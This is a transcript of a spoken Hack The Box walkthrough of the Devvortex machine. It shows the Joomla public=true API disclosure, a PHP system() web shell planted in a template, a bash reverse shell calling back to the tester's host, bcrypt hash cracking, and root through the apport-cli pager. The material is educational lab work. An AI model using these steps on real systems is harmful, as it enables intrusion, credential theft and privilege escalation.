What's going on YouTube? This is Ipsec. I'm doing dev.vortex from HackTheBox, which is a relatively easy machine, but if you zip through it and just use public exploit scripts, you're not going to get everything the machine has to offer because the two main exploits of this box are relatively common exploits. So if you just run the script, you're not going to learn that much. It starts off by finding a Joomla instance that is vulnerable to an information disclosure vulnerability. Essentially, you can hit some API endpoints as an unauthenticated user, use that to dump the config that has database credentials you can log into Joomla with. Now, the information disclosure vulnerability actually is chained with a mass assignment vulnerability that is really interesting, so we'll take a deep dive in that while we exploit it. And then the next step, you just log into the database, get a hash, crack it, and log in as a different user that can run a crash reporting command as sudo. This one has a recent CVE as well that you can use to exploit the pager, which is just using less and able to get a shell from that. But a lot of commands with sudo that use a pager are vulnerable to this. So with that being said, let's just jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the nmap directory and call it dev.vortex. Then the IP address of 10.10.11.242. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Nginx, also running on Ubuntu, and it's directing us over to dev.vortex.htb. So let's go ahead and add this to a host file. So sudo v etc host, and then we can add 10.10.11.242 dev.vortex.htb, and take a look at the website. So going there, we see just a page. It says, welcome to dev.vortex. And the first thing I'm looking for is like where I can send input to. Is this just like a static page? What is it? I also have this Wappalizer. We can see all the technologies it utilizes. There's not much there. There is this request a callback form. If we try to subscribe, we have to do a email. Let's see, it's just directing us to question mark, so it doesn't look like it's really accepting anything. So I also notice all the extensions are .html. If we tried like index.php, not found, everything is HTML. So I could either do like a GoBuster and brute force directories or virtual host. We could do them both simultaneously, but I like only doing one at a time. Otherwise, you can overload the server. So I'm going to start with just virtual host fuzzing. So let's do GoBuster, and then I'm going to think it's vhost, right? GoBuster, yep, vhost. Then the URL, http dev.vortex.htb. And then the word list, we'll do op sec list, discovery DNS. We'll do the top 5,000 subdomains, I guess. So running this, we do get a hit almost immediately on dev. So let's go ahead and add dev into our host file. So we can do dev.devvortex.htb, save that. And let's take a look at what is dev. So dev.devvortex.htb. Was that it? Let's see. Yes, the page looks somewhat similar, just in the sense that it's a bootstrapped page. I guess it doesn't look that similar at all. Even the title bar is different. But let's see what we have here. So it's just another banner about what dev.vortex is. Oddly enough, the services there is a bit screwed up. And there's nothing really too interesting. If we go over to the Wappalizer, it tells us it is running Joomla. And we could find out Joomla if we just like guessed directories. I think Joomla's default is /administrator. And we get a login here, right? We could also try like /admin and other things, but that's what Joomla's is. Those are just common ones I try out. I bet robots.txt is probably here as well. If we look at it, robots.txt also tells us it is Joomla. So the first step most people probably do is just look at like a Joomla vulnerability scanner. There aren't many good ones. I guess JoomScan is probably the best one right now. However, I don't like it mainly because it's written in Perl, but it is kept up to date, or it was. Oh, that's Joomla Scan. So one of the key pieces when looking at analyzers is try to pick one that has been updated recently, right? So I found JoomScan, but we want to go to JoomScan, which is part of OWASP. So I think that's why it is kept more up to date. We see 5 months ago there was a commit. So let's just go ahead and pull this to run it. So git pull or git clone. There we go. We can go in JoomScan. And there aren't really many arguments for this one, right? So we just got like URL. We can enumerate components if we want to, but there's not that much. So let's just do URL, HTTP, dev.devvortex.htb. What? So I guess, let's see, DOS to Unix. It's got a weird like line break right here. I forget what the !m is, but that's odd since it just came from the GitHub repo. There we go. DOS to Unix fixed it up. And right away, JoomScan does detect it is version 4.2.6 and says the core is not vulnerable. While that runs, you can also do all this stuff manually. Joomla makes it oddly easy for you to verify the version. It's like the administrator manifest file. I forget exactly where it's stored, but I'm always surprised that this isn't like behind authentication, mainly because it's in the administrator directory. But it says it right here, or maybe no, this is 2016. Let's see. So this is the file I think JoomScan hits. So if we go here, and if you searched ipsec.rocks for Joomla, I'm sure you would find this as well. But we get the administrator manifest file, and that also says 4.2.6, and the creation date was December of 2022. So if we Google around for Joomla 426 exploit, let's see if there's anything here. Code execution there. There's a bunch of things on exploit.db and GitHub. So this is talking about on February 16th, there was a security advisory. And let's see. Okay, it exposes the version here. It also exposes the version in this file, apparently. So this post is just saying how threat actors are discovering the version before they go and exploit it. And here is the actual exploit. So it's adding public equals true to the end of the URL, which is a bit odd. If we just go to like this API v1 config, we get a forbidden. But if we just tell the application, hey, let's make this public, it gives it to us. And we're going to talk about exactly why it does it, because it's really interesting. The first thought like is always backdoor or something, but never think something's nefarious, because more often than not, it's just a simple explanation down to a misunderstanding. But if we look at the config, and I know when I say misunderstanding, this is a mass assignment vulnerability. It's not actually hard-coded to allow this. So that's why I said it's interesting. But we do get the user, Lewis, and the password here. And if you looked more into the vulnerability, we're dumping the config of the application, and this is the database password, right? So if we wanted to, we could go over to the dev.vortex administrator and try these credentials. We should also keep notes of them just so we can use them later if we want. Let's go here, and it was Lewis. Log in, and we get logged in. So let's put this on the back burner because I want to talk about the exploit because it's really interesting. I think there's another URL we could potentially hit. Well, there's a lot of URLs we could hit, but another good one. We could also do a user dump. So if there are other users on this, if we hit like API users, we're going to get a forbidden. But again, if we say public equals true, this is going to list all the users. We don't get their password hashes, but we can see Lewis and Logan are on this box. So let's talk about the exploit. If we go here, we see the Joomla advisory. Let's see. On February 16th, Joomla published a security advisory. So Joomla's open source. I'd start with the security advisory, find out the fix date, right? We see it's 2023-02-16, and it is version the 4.0 line, right? So let's go Joomla GitHub. And let's find their GitHub page and just look at what happened on, was it February 16th? Yeah, February 16th. So let's go over to the commits. And it put me on the 4.4-dev branch. I guess that's fine. I want to be on the 4 branch because, again, it was patched around that time. So I'm going to change my time to February of 2023. And we'll do the week of the 16th. And then we look through the commits, and one sticks out right away. We have on the 16th, merge branch 428 security release into 4.2 dev. So if we take a look at this, we will see it updating a bunch of just XML metadata we don't care about. But right here, this is the fix. In this file, the parse API route, they're saying if the key public exists, then unset it. So let's see, view file. Okay, we can look at this file, and while I do this, I am actually going to clone Joomla so we can jump through in Visual Studio Code. So we'll do a git clone -b, was it 4.4-dev? Yes, it was. There we go. So let's take a look at this code. So in this API router, we have this piece of code. So it's going to do a parse API route, and it's saying the valid methods. And then we're going to get the route path. And right here, we're going to get the query. So we're going to assign, it's essentially saying a variable is equal to PHP input, and it's probably going to be $1 like that, right? Essentially, I think that's what this is doing. It's going to grab all the supplied parameters and put them into this query. And this piece of code didn't exist before, so it would just keep going down. And if we look at the comment, it says remove public key as it's only coming from the route definition. So what we have here is we have two like structures merging. We have the route definition that probably defines public, and then we also have the get parameters, and it allowed us to set public. So despite it being defined in the route definition, because we set it later from the user, then it overrides that, and all of a sudden a route that used to require authentication no longer does, right? So that's just a mass assignment vulnerability. They never really specified the user can specify public. They're just saying the user can give arguments to API endpoints and then we'll merge it, right? That's typically how a mass assignment works. It's just developer not expecting you to be able to control a variable. So let's take a look at exactly where parse API route comes from. Maybe we can talk about this a little bit more. Let's see, Joomla CMS code. Let's see. Once this loads, I'm going to do edit, find in files. I'm going to look at this parse API route to see where it's used. API route is where we had it defined, and we go into this router. So let's see. This is just setting up the route. We parse the API route. Let's doing some checks right here. Let's see. Right now, we're going through all the variables in the route. I'm guessing this is where we can set public, right? And then right here, we have if route vars public. If this is not set, because we have the exclamation there. So if this variable is not set, or the variable is equal to false, then require logging in, right? We set the variable to true, so it passed. And based upon this, we could just set it to be anything. We didn't need to say public equals true. So if we wanted to go back here, let's see. Set API v1. So we have public equals true. We can say public is equal to please subscribe. Please subscribe does not equal false, so it still lets us do this, right? So this is that line of code. If you want to see how that route is actually defined, let's do v1, what was it? I'm going to do config application. So if we grab this string, v1 config application, just search for it, we can see how this route gets defined on before API. We're defining v1 config application and then giving it all the parameters. We have this get defaults. And if we look at the get defaults, it's going to set public is equal to false. So right here, we're saying public equals false. It defines that route. Joomla goes and pulls this route. It sees public is equal to false. Then our request says public equals equal to true with some other arguments, supposedly. And when it does that, it merges our arguments where the route definition is, and we overwrite the public variable and say everything is public. So that's how the exploit works. The whole reason why the API is working this way, where it just takes user input and assigns them to a variable, is likely because every API endpoint requires different arguments, right? So you can't hard code all the arguments. You just want to say, hey, we're going to take some arguments from a user, give them to this endpoint. So that's why the fix was just after we take all the endpoints from the user, let's make sure public isn't in there. If it is, let's unset it before we merge it back into our route. So hopefully that exploit or talking about it was interesting to you. Another fun fact here, I guess, while we're on this route is after finding this, I would probably run things through Sneak to see if Sneak would discover the vulnerability. If it doesn't, then I know I always should be looking at route definitions, or you always should, but I would prioritize it more. The other thing I'm thinking about is this vulnerability was there for quite a while, right? How would I have found this? I don't like depending on code analysis to find vulnerabilities because it's very time consuming. But what I could have done if I was looking at Joomla, right? I take something that has a forbidden, right? And you should be doing this anyways. And then going to a tool like ffuf. So let's do ffuf-u, go here, and I can say fuzz is equal to, we'll just do 1, right? And then let's do a word list. We can say opt, sec list, discovery. Is it web, then API? Let's see. Web content. I thought there was an API one. Maybe fuzzing. Maybe it's not under discovery. Fuzzing API. Find opt sec list grep-i API. So let's grab this. So I'm going to go back here where the -w is, copy. And what word list do we want to use? We can say API endpoints and just try this. I haven't done this before. I'm assuming it's going to find something, and it did not. Grep public in this. That's not there because endpoints is taking the entire URL. That's definitely not what I want. Discovery, web content. Let's just do raft small words dot text, or we can do lowercase as well. And this one may take a while, but eventually I think we will find one that says public is equal to true, or public is equal to something, and it won't be a 403. It'll be a 200, and this ffuf will say it, right? I know a lot of people just think fuzzing arguments is silly. It used to be considered super guessy on HackTheBox. I know we had a few machines years ago that had it, but this is a fun application of seeing how this could actually help in the wild, right? So I'm going to pause the video, let this ffuf run. If it doesn't find it, I will be shocked. And I did not expect that to happen. We don't have it at all. I'm positive public is in this word list. So if we look at public, let's make sure the string starts and ends. Yes, it does. So one of two things either happen. Maybe there's an HTTP header it doesn't like, or one is being treated as false in PHP, which I don't think is the case. If we do if one, then echo true. I had to put the semicolon there. That works. 0. So I don't think that's the case, but it very well could be. And I thought about editing backwards and not showing this failure, but it's important to know when you're doing this type of fuzzing, things to watch out for. And maybe like 1 or 0s, not a good thing to put here. Maybe you should just put a string that doesn't mean anything, right? Or do both 0 and 1 to see the behavior. Just don't settle on 1. But that may not be the issue. So let's go and send it to a proxy. So we can do HTTP 127.0.0.1.80.80. So this is going to send the request from ffuf over to Burp Suite. Right? Yes. Okay. And the first one was temp. And could not match accepted header. What in the world? It doesn't not like. So whenever you do fuzzing, you should always make sure like do a vanilla request to test it, because there could just be something that is bad. And I'm still confused by this. So let's go send a valid one, right? Clear the queue, go to Burp Suite, add it. And this is a request that works. So is it going to be the user agent? I don't think it's going to be that. There's no way it is that. Okay, good. So the next thing, do we need a cookie? We have to do a line break there. No. So it's not the cookie. Let's see. We send it forbidden. Host, accept. I bet it's the accept. Line break. Yes. It was the accept line that it did not like. I guess it couldn't do gzip? Like if we just got rid of accept encoding altogether? Nope. It needed... let's go backwards. It wasn't accept encoding. We just need accept. So when we talk to the API, it really wants to know what we accept. And I really hate that by Burp Suite. So it's not encoding. It's just accept. And I bet like text JSON cannot. I don't know what JSON is. What if we can do star/star to accept everything? Yeah, we could. Content type, application, JSON. So this is all we needed in the accept, right? So what the API is doing is saying what type of data we accept. If we don't accept the type of data it gives us, it refuses to work with us. So that is interesting to know, actually, right? We just need that header. So we could redo the ffuf with that header. And I'm just going to make word list. We can say public does not exist, and we'll do please sub, just so it goes a bit quicker, right? Actually, no, I want to fuzz with everything to see if there's many false positives in this. So we'll fuzz with everything. -h for header. And what was it? Accept. And then we can do star. Okay, so we get a bunch of 401s. So we can say filter code 401. So now we're going to hide all 401s. And we have public right away coming back at us. And I am curious. We have public is equal to 1. If I did public is equal to 0, I'm guessing that's going to translate to false. It does not. So that actually surprises me. Because we saw in the code where it said does not equal false, but obviously public just has to be set. Even if you set it to false, it'll still pass it, right? So I'm just going to see if there's any other things we can send here. I know format worked before. On the last one, that's probably just saying what type of format do we want it in. I'm guessing like HTML may work or something. I don't know, but you'd have to see exactly what the format parameter is, because I'm guessing that's another mass assignment thing that's screwing up things, but I doubt format is actually going to be a security vulnerability. This is just probably a non-exploitable bug that's happening there, right? So, yeah, I'm just going to let the fuzz finish, and then we will finally move on to getting a shell on the box. And after about 15 minutes, the fuzz has finished and we only have 2 results, and it's what we expected. The format, I don't think was a security relevant thing, but public is here. So if you ever wanted to fuzz arguments on API endpoints, this is probably a good reference. Always start out by just doing a vanilla request to make sure it's what you expect, because there may be a header that is missing that you just don't expect, like that except one that we saw. So let's now log into the box. If we went to the config, we saw the Lewis user and then the password of Panther got something. I can't even read that text, but that let us log into Joomla. And I don't know if I'm actually still logged in. Let's just go to dev.vortex.htb/administrator, and I want to turn Burp Suite off. So going here, nope, not logged in. So what was it? Lewis, log in. And then whenever you get access to a PHP app, the most common way to get a shell is either going to be uploading a plugin, which I think would work, or just editing a template. Editing a template is much easier because with a plugin, you just have to do a little bit of research to see exactly how the plugin system works for that CMS. It's normally like a zip file with a manifest that explains it and then some PHP code or whatever the language is. But with templates, it becomes a little bit easier because you just have straight PHP files that you have to edit. The main issue is finding out where they exist. If I go to System, Site Templates, then we see this Cassiopeia details and files, and we have a few files. Now, when editing a template, I generally go for a file that's probably not going to be used. Like if we do index and screw something up here, we're going to take the site offline. That is not good. Offline or error, these are probably going to be fine. I'm just going to do error because if the error page errors, that may be expected. I don't know. But offline or error both could be good candidates. And then all we want to do is put some PHP code in to get a shell. So I'm going to say if is set, then we can say request CMD. And then we can do system request CMD. So the reason why I'm checking if is set first is because if you access this error page without CMD and just do system CMD, then you get a big nasty error, right? Putting that if is set thing is just a somewhat decent OPSEC thing to do, right? So we can save that. And then we want to go to this file. So I'm going to go HTTP, dev.vortex, and then go templates, Cassiopeia, error.php. I forgot to do HTTP beforehand, I think. So it's searched, dev.vortex, like that. Why is it? I don't want to search. Okay, I'm just going to do this in Burp Suite. I'm not exactly sure what my Firefox is doing. Maybe I had a space between the HTTP and not. I'm not positive, but this will work just fine. Okay, so right off the bat, we have internal server error. That's not great. We do CMD, who am I? So I think we have an error in our PHP code. So if is set, I wonder if we have to put what's in the if in parentheses. Save. We're still getting internal server error. So what I'm going to do is remove my code. Oh, I was intercepting. So when I click save, it never actually saved. Let's go back. Try this way. And there we go. We have it. So again, I can show you what happens if we don't have that if as set, right? So if I just do the save, we go here, it works. But let's say someone just browsed to error.php. It actually still worked. I expected that to crash. But whenever you do reverse shells, I don't always show it in my videos, but that is a good thing to do. So let's go back here. CMD equals ID. Okay. Let's just get a reverse shell. So we can do bash-c, then bash-i, dev tcp 10.10.14.8, 9001, 0, and 1. URL encode this. Send the shell. Then let's import pty spawn bin bash. Let's fix our tty, rows 28, columns 110. And then stty raw minus echo foreground. There we go. So now we have a reverse shell. So the very first thing I want to do is just export the database, right? And we could grab it from the Joomla config. It's probably going to be like in the root as configuration.php, but we know the credentials it's logging in as, right? If I do a less on this, I'm going to search Lewis, right? We can see the user and password because the config we exported from this public. This is this file, right? And we have the database credential here. It matches up. So we could have done it either way. We didn't need to cat this file. So let's log into the database. So I'm going to do mysql-u lewis-p, put in the password, show databases, use Joomla, show tables, and let's see, describe SD for FG users. So we see all the tables or the columns. And I'm going to say select username, email, password from the users. And let's see, we have Lewis and Logan. So let's go and send these over to the Kraken. So let's do SSH, Kraken, cd, hashcat, v hashes, and I'm going to call this dev.vortex. We can say Lewis and then Logan. Okay. So we can say hashcat and then hashes dev vortex. We also have to specify users because I put the username first. And then the word list, I'm just going to do opt word list rocku.txt. Is it just user? There we go. So now this is going to start cracking. We have to specify the mode because this conflicts. And this looks like 3200, which is just straight bcrypt. The other one said like e-commerce, right? So I don't think Joomla is going to be under e-commerce. So I just used the standard bcrypt, which is going to be the most common one, right? So now that we have it running, we have one hash that's already cracked, and it is Tequiro Mucho, maybe? Let's see. The one thing I don't like is when you specify the users, it doesn't say it as it goes, right? We have to, I guess we could just quit. I think I could have just SSH'd again and ran it, but that was the credential I wanted. If we get rid of the word list and do --show, we can see Logan has this password. So what I'm going to do is try SSHing in. So we can SSH dev.vortex.htb. And I could have just done like an SU on my terminal, right? It was Logan. And the reason why I'm not trying it on Joomla or anything, because we've already completely popped Joomla. There's no point in popping it more, right? We had an admin. So this was the only other place we could try a login for. So checking the sudo list, which is one of the first things I always do, I see we can execute this binary with sudo. So my first thought is, oh, this is going to be a gtfobin. So if I go to gtfobins, we type appo, does not exist. So let's see what this is. I'm going to guess this is a application, like an error reporting thing, just because I've seen AP port before. I forget exactly what it stands for, but pretty sure it's error reporting, right? No crash reports. We can do -help and see what is here. My first thought is trying to find something that lets me include a file. So maybe I can just like include root.txt and it goes and outputs it. If we do -c and then a path, maybe that does it. So we can say sudo apport-c root.txt, and it can't be processed, not enough values. So we need an actual error report here. So the other thing we could also do is look at the version, and we see 22011. So let's go Google that. I'm going to copy this, apport-cli, grab this version, go over to Google, and we do have a privesc. And I don't know what this is doing. This is creating a test log. Did it say what version this is? Oh, 2.0. We're on... Maybe this would work. I don't think so. Let's see. Date. Let's see. Before Ubuntu, new name -a. Where are we? We exploit this by launching a rev shell. Let's see what else there is. Maybe we'll do that. Race condition. I add exploit to it. Older version. So it looks like this may be vulnerable. 2011, and that is what we have. So let's try this actually. I have not ran this exploit script. Option, allow anyone. This is log rotate. We don't have sudo log rotate, so that won't work. Here's a 2023 CVE. I think the other one was 2021, which is why I was like questioning it, right? And we can see this one is talking about using the pager functionality. So it does sudo, we view a crash, and then this is probably going to be in less. Yeah, less is configured as the pager. So let's do export pager is equal to, do we have pager? We don't. I don't think we have to set pager. We just have to overfill the text. So if we do sudo -h, let's see, what options do we have? We can file a bug. And I think this is the line that we could potentially get into something. Let's see. I just did a dist upgrade. We'll see what happens here. But I may want to set my terminal size to be small. That way it will, I can't even speak. If I set my terminal size to small, then it will use the pager less so we can like scroll through it, right? Let's view the report. Oh, I'm in less already, right? So I'm going to do a : bin sh, and we drop down to root. So that is it. let's try something real quick. So generally how the pager works, the pager is just a way to view text that would normally go off your screen, right? If I do stty-a, it is 110 columns. So for the pager to be invoked, it just has to be longer than, rows. We want rows. For the pager to be invoked, we want to be more than 28 rows, right? So if you're doing this and it's not working, try sending like stty rows 1. And then if we try this exploit again, does it do it any earlier? Maybe it won't. But it's just playing with it until it goes into this. And this has been a somewhat common vulnerability with just applications running as sudo, is this pager. It does not, I kind of expected this screen to trigger the pager, but only triggers when we try to view the report, right? We see the report is all screwed up because less thinks my rows is only 1. So that's why it only displays it 1 at a time. So that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.